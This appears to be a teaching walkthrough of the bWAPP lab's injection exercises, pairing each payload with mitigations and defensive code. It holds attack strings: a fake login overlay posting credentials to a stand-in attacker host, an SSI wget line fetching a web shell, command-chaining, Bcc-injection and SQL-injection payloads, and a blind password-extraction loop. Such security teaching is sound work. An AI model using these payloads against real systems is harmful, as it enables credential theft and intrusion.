1) HTML Injection - Reflected (GET/POST):
Payload: <script>alert(document.cookie)</script>
Mitigation:
GET and POST are the HTTP methods the form uses to send the data to the server. Blocking special characters such as < > / in the input is only a weak first line of defence; the reliable fix is to encode the value for the context in which it is written back into the page:
- In JavaScript, encode the angle brackets before a string is inserted as HTML: html = html.replace(/</g, "&lt;").replace(/>/g, "&gt;");
- With jQuery, extract only the text from a string that may contain markup:
function (html) {
return $($.parseHTML(html)).text();
}
($.parseHTML still creates DOM nodes from the string, so treat the input as untrusted and write user data with .text() rather than .html().)
- In PHP, if a string may contain HTML, encode it with htmlspecialchars() before echoing it; ENT_QUOTES also encodes single and double quotes so the value cannot break out of an attribute:
$msg = "<div></div>";
$safe_msg = htmlspecialchars($msg, ENT_QUOTES, 'UTF-8');
echo $safe_msg;
- Sanitize user input before it is written into DOM objects (innerHTML, document.write and similar sinks); use textContent or createTextNode where only text is expected.
2) HTML Injection - Reflected (URL):
Payload: the page reflects the host address of the request, so changing it (a tampered Host header or URL) acts as the payload.
Mitigation:
Server-side code must not echo the Host header or request URI back into the page unencoded. Validate the Host header against the list of host names the application actually serves and reject requests that carry any other host; if the URL has to be displayed, HTML-encode it first.
3) HTML Injection - Stored (Blog):
Payload:
<div class="code"><iframe SRC="http://attackerIP/blah" height="0" width="0"></iframe></div>
<div class="code">test</div>
<div style="position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; z-index: 1000;
background-color:white;">
Session Expired, Please Login:<br>
<form name="login" action="http://attackerIP/lol.htm">
<table>
<tr><td>Username:</td><td><input type="text" name="uname"/></td></tr>
<tr><td>Password:</td><td><input type="password" name="pw"/></td></tr>
</table>
<input type="submit" value="Login"/>
</form>
</div>
Mitigation:
- Encode the stored text on output (and validate it on input) so that characters such as < > / and tags such as <script> and <iframe> are rendered as text rather than interpreted; blocking characters alone is easily bypassed.
- Sanitize user-supplied data before it is assigned to DOM object properties. The payload above works because the blog entry is written straight into the page: the hidden iframe loads attacker content and the absolutely positioned "Session Expired" form overlays the real page and posts the credentials to attackerIP.
4) IFrame Injection:
Payload: a crafted value in a URL parameter that the page copies into an iframe's attributes (or into the page body) makes the browser load an attacker-chosen frame.
Mitigation:
- Encode or validate the parameter before it is written into the iframe's attributes. The file-permission advice below only stops an attacker who has obtained write access to the site's files (the usual way hidden iframes are planted on a compromised host); it does nothing against a reflected parameter.
- Set the site's files to read-only: develop offline, upload, and set the permission to 444 (read only). If you must make a change live, make the page you are working on writable, edit it, and set it back to read-only when you have finished.
- Use a web application firewall (WAF).
5) Mail Header Injection:
Payload: nilesh83@gmail.com%0aBcc:allotherpeople@thecompany.com
(%0a is a URL-encoded line feed; once decoded, the text after it becomes an additional Bcc: header in the generated message.)
Mitigation:
- Never trust user input fields. All user input should be considered untrusted and potentially malicious. Applications that process untrusted input may become vulnerable to attacks such as buffer overflows, SQL injection, OS command injection, denial of service and e-mail injection.
- Use regular expressions to validate user data: at a minimum reject any header value containing \r or \n, and check that an address field holds exactly one well-formed address.
- Use external components and libraries that protect against this problem, such as Zend Mail, PEAR Mail and Swift Mailer.
- ModSecurity can stop e-mail injection at the server level: it can scan the GET or POST body for Bcc:, Cc: or To: and reject any request that contains those strings.
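The two checks above, worked through in Python against the page's own payload. This is an added example, not code from the original page; the header layout, the address pattern and the sample subject are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote

# The payload quoted on the page; %0a is a URL-encoded line feed.
PAYLOAD = "nilesh83@gmail.com%0aBcc:allotherpeople@thecompany.com"

# One address: local part, '@', at least two dotted host labels (assumed
# pattern). \A and \Z are used instead of ^ and $ because $ still matches
# immediately before a trailing newline, which would defeat the check.
ADDRESS_RE = re.compile(r"\A[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\Z")


def build_headers_vulnerable(to_addr, subject):
    """Concatenates the (already URL-decoded) form values into the header block."""
    return "To: %s\r\nSubject: %s\r\n\r\n" % (to_addr, subject)


def recipient_headers(header_block):
    """Names of the recipient headers an MTA would see in the block."""
    found = []
    for line in re.split(r"\r?\n", header_block):
        m = re.match(r"(To|Cc|Bcc):", line, re.IGNORECASE)
        if m:
            found.append(m.group(1).capitalize())
    return found


def validate_address(raw):
    """Return the decoded address, or raise ValueError if it could inject a header."""
    value = unquote(raw)  # the web framework normally decodes; shown explicitly here
    if re.search(r"[\r\n]", value):
        raise ValueError("CR/LF in address field")
    if not ADDRESS_RE.match(value):
        raise ValueError("not a single well-formed address")
    return value


def is_safe_address(raw):
    try:
        validate_address(raw)
    except ValueError:
        return False
    return True


def build_headers_safe(to_addr, subject):
    to_addr = validate_address(to_addr)
    # Subject is free text, so line breaks are replaced rather than rejected.
    subject = re.sub(r"[\r\n]", " ", subject)
    return "To: %s\r\nSubject: %s\r\n\r\n" % (to_addr, subject)
```

With the decoded payload, the vulnerable builder emits both a To: and a Bcc: header; the validating builder rejects the same value before any header is written, and also neutralises a line break smuggled through the subject.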
6) OS Command Injection:
Payload: ping localhost && ls (the && or ; operator appended to the user input chains a second command onto the one the application runs).
Mitigation:
Build a strict validation mechanism for the value: allow only the characters a host name can contain (alphanumerics, dots and hyphens) and reject everything else, rather than trying to recognise attack patterns such as www.nsa.gov; ls from a database of signatures. The attack works because the shell treats & and ; as command separators, so the user input stops being data and becomes part of the command line; the application should therefore also avoid invoking a shell at all and pass the validated value as a separate argument to the program it runs.
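The validation and the no-shell invocation described above, as an added Python example (not code from the original page). The host-name pattern, the argument list and the quoting fallback are this example's assumptions.

```python
import re
import shlex
import subprocess

# Only what a host name may contain: alphanumeric labels separated by dots or
# hyphens, never starting with '-' so the value cannot be read as an option.
HOST_RE = re.compile(r"\A[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?\Z")


def is_valid_host(value):
    return bool(HOST_RE.match(value))


def shell_command_vulnerable(host):
    """The command line the vulnerable form builds: input pasted into shell text."""
    return "ping -c 1 " + host


def ping_argv(host):
    """Validated argv for subprocess with shell=False: no shell, no metacharacters."""
    if not is_valid_host(host):
        raise ValueError("invalid host name: %r" % host)
    return ["ping", "-c", "1", host]


def shell_command_quoted(host):
    """Second line of defence if a shell is unavoidable: quote the whole value."""
    return "ping -c 1 " + shlex.quote(host)


def run_ping(host, timeout=10):
    """Runs ping without a shell; the host is one argument even if it holds ';' or '&&'."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=timeout)
```

The allowlist rejects the page's payloads outright; even if a bad value slipped through, passing it as its own argv element (or quoting it with shlex.quote when a shell really is required) means the shell never sees && or ; as operators.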
7) PHP Code Injection:
Payload: phpinfo() supplied in a parameter whose value the application evaluates as PHP code; the same class of bug arises when user input reaches include(), include_once(), require() or require_once().
Mitigation: Never pass user-controlled input to eval(), include(), include_once(), require() or require_once(); if a file or function must be chosen from user input, map the value onto a fixed allowlist. The PHP functions below are output-encoding helpers: they stop injected text from being rendered as HTML, but they do not make user input safe to execute.
- htmlspecialchars() turns &, ', ", <, and > into HTML entities (&amp;, &quot;, &lt; etc.)
- htmlentities() turns all applicable characters into their HTML entity format.
- strip_tags() removes all HTML and PHP tags.
8) Server-Side Includes (SSI) Injection:
Payload: <!--#exec cmd="ls" --> , <!--#exec cmd="cd /root/dir/" --> , <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --> , <!--#config errmsg="File not found, informs users and password" -->
Mitigation:
- Disable SSI execution on pages that do not require it. For pages that do require SSI, perform the following checks:
- Only enable the SSI directives that are needed for the page and disable all others.
- HTML-entity-encode user-supplied data before passing it to a page with SSI execution permissions, so that <!--#exec ... --> is rendered as text instead of being executed.
- Use suEXEC to have the page execute as the owner of the file instead of the web server user.
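Output encoding is the common fix for sections 1 and 3 (HTML injection) and section 8 (SSI injection), so one added Python example serves all three; it is not code from the original page. html.escape with quote=True does the same job as PHP's htmlspecialchars with ENT_QUOTES. The attribute-context payload, the wrapper markup and the attribute-scanning helper are this example's assumptions; it also shows why merely stripping < and > is not enough.

```python
import html
import re

# Constructed inputs: the payloads quoted in sections 1, 3 and 8 of the page,
# plus one attribute-context payload (assumed here) containing no angle brackets.
REFLECTED_PAYLOAD = "<script>alert(document.cookie)</script>"
STORED_PAYLOAD = '<iframe SRC="http://attackerIP/blah" height="0" width="0"></iframe>'
SSI_PAYLOAD = '<!--#exec cmd="ls" -->'
ATTRIBUTE_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def strip_angle_brackets(value):
    """The page's 'block < and >' idea, implemented literally."""
    return value.replace("<", "").replace(">", "")


def encode_for_html(value):
    """Encoding for an HTML text node or a double-quoted attribute value.

    html.escape(quote=True) rewrites & < > " and ' as entities, so the value
    can neither close the surrounding element nor open a tag, an SSI
    directive, or a new attribute.
    """
    return html.escape(value, quote=True)


def render_comment_vulnerable(comment):
    """Writes the stored blog text straight into the page (section 3)."""
    return '<div class="code">%s</div>' % comment


def render_comment_safe(comment):
    return '<div class="code">%s</div>' % encode_for_html(comment)


def render_attribute_vulnerable(value):
    """Reflects the submitted value into an input's value attribute (section 1)."""
    return '<input type="text" name="comment" value="%s">' % value


def render_attribute_safe(value):
    return '<input type="text" name="comment" value="%s">' % encode_for_html(value)


def injected_attributes(rendered_input):
    """Attribute names on the rendered input other than the three we emitted."""
    names = re.findall(r'\s([A-Za-z-]+)="', rendered_input)
    return [n for n in names if n not in ("type", "name", "value")]
```

Stripping angle brackets leaves the attribute payload intact, because it needs only a double quote to escape the value attribute and add onfocus/autofocus; encoding the quote as &quot; keeps the whole value inside the attribute, and the same call renders the script, iframe and SSI payloads as inert text.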
9) SQL Injection (GET/Search):
Payload: iron man' or 1=1 # ; the payload is refined on the basis of the database error message the page returns.
10) SQL Injection (GET/Select):
Payload: a UNION SELECT (or a second SELECT) appended to the user input, e.g. union select 2,3,4,5# once the column count of the original query is known.
11) SQL Injection (POST/Search):
Payload: iron man' or 1=1 #
12) SQL Injection (POST/Select):
Payload: union select 2,3,4,5#
13) SQL Injection (Login Form/Hero):
Payload: ' OR 1=1#
14) SQL Injection (Login Form/User):
Payload: bee' OR 1=1#
15) SQL Injection (SQLite):
Payload: ' OR 1=1;
16) SQL Injection - Stored (Blog):
Payload: test','anonymous')#
17) SQL Injection - Stored (SQLite):
Payload: ','');
18) SQL Injection - Stored (User-Agent):
Payload: Prakash','0.0.0.0')#
19) SQL Injection - Blind - Boolean-Based:
The application returns no data or error text, only a true/false difference in the response (for example a row found or not found), so the payload is a condition whose truth is inferred from that difference.
Payload: test' or 1=1#
20) SQL Injection - Blind - Time-Based:
Payload: time-based SQL expressions such as sleep(30) attached to a condition; whether the response is delayed reveals whether the condition held.
21) SQL Injection - Blind (SQLite):
Payload: ' OR 1=1;
22) XML/XPath Injection (Login Form):
Payload: whatever' or 1=1 or '
Mitigations for all SQL Injection attacks
Mitigations for all these types of attack can be developed in the following ways:
- White listing: a white list allows only the expected characters or values to pass through; for a user-name field that means accepting a value such as admin and rejecting anything containing quotes, comment markers or SQL keywords.
- Sanitization: removing or escaping the unwanted characters from the input, so that ' OR '1=1' -- is reduced to the literal value the field is supposed to carry (admin in the example).
- Black listing: a black list can be used but is not effective if all types of injection are considered; a black list backed by a regularly updated database of patterns may help.
- Calling stored procedures, but only with bound parameters; the classic-ASP pattern below still concatenates the query-string value into the command text and is therefore just as injectable as inline SQL:
Query = "exec insertUsername @value1=" & Request.QueryString("value1")
- Avoid using dynamic SQL inside stored procedures.
- Use prepared statements with parameterized queries, for example (Java/JDBC; parameter indexes start at 1, and the statement must be created from an open Connection):
public boolean authenticate(Connection conn, String name, String pass) throws SQLException {
    String sql = "SELECT name FROM user WHERE name=? AND passwd=?";
    PreparedStatement pstmt = conn.prepareStatement(sql);
    pstmt.setString(1, name); // bound as data, never parsed as SQL
    pstmt.setString(2, pass);
    ResultSet results = pstmt.executeQuery();
    return results.next();   // true if a matching user exists
}
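The difference between string-built and parameterized queries, run end to end in Python against an in-memory SQLite table. This is an added example, not code from the original page: the table, its two users and the blind-extraction loop are constructed for the demonstration. Because SQLite does not recognise # as a comment marker, the page's MySQL-style payloads are written here with -- instead; the login-bypass, UNION (sections 10 and 12) and boolean-blind (section 19) techniques are otherwise the same.

```python
import sqlite3


def make_db():
    """Constructed sample data; 'bee' mirrors the user in the page's login payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT NOT NULL, passwd TEXT NOT NULL)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("bee", "bug"), ("admin", "s3cret")])
    conn.commit()
    return conn


def authenticate_vulnerable(conn, name, pw):
    """Builds the query by string formatting, as the vulnerable login form does."""
    sql = "SELECT name FROM user WHERE name='%s' AND passwd='%s'" % (name, pw)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def authenticate_safe(conn, name, pw):
    """Parameterized query: the values travel separately from the SQL text."""
    row = conn.execute(
        "SELECT name FROM user WHERE name=? AND passwd=?", (name, pw)
    ).fetchone()
    return row[0] if row else None


def blind_extract_password(conn, victim, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Boolean-based blind extraction against the vulnerable login.

    Each probe injects a condition on one character of the victim's password;
    the only signal read back is whether the login 'succeeds' (a row comes back).
    """
    recovered = ""
    while True:
        pos = len(recovered) + 1
        for ch in alphabet:
            probe = "%s' AND substr(passwd,%d,1)='%s' -- " % (victim, pos, ch)
            if authenticate_vulnerable(conn, probe, "x") == victim:
                recovered += ch
                break
        else:
            return recovered  # no character matched at this position: end of password
```

The injected name ' OR 1=1 -- turns the WHERE clause into a tautology and logs in as the first user; a UNION SELECT in the same field returns the admin password in place of a name; and the blind loop recovers it one character at a time from nothing but success/failure. The parameterized version returns no row for any of these inputs because the quotes and comment marker are bound as data.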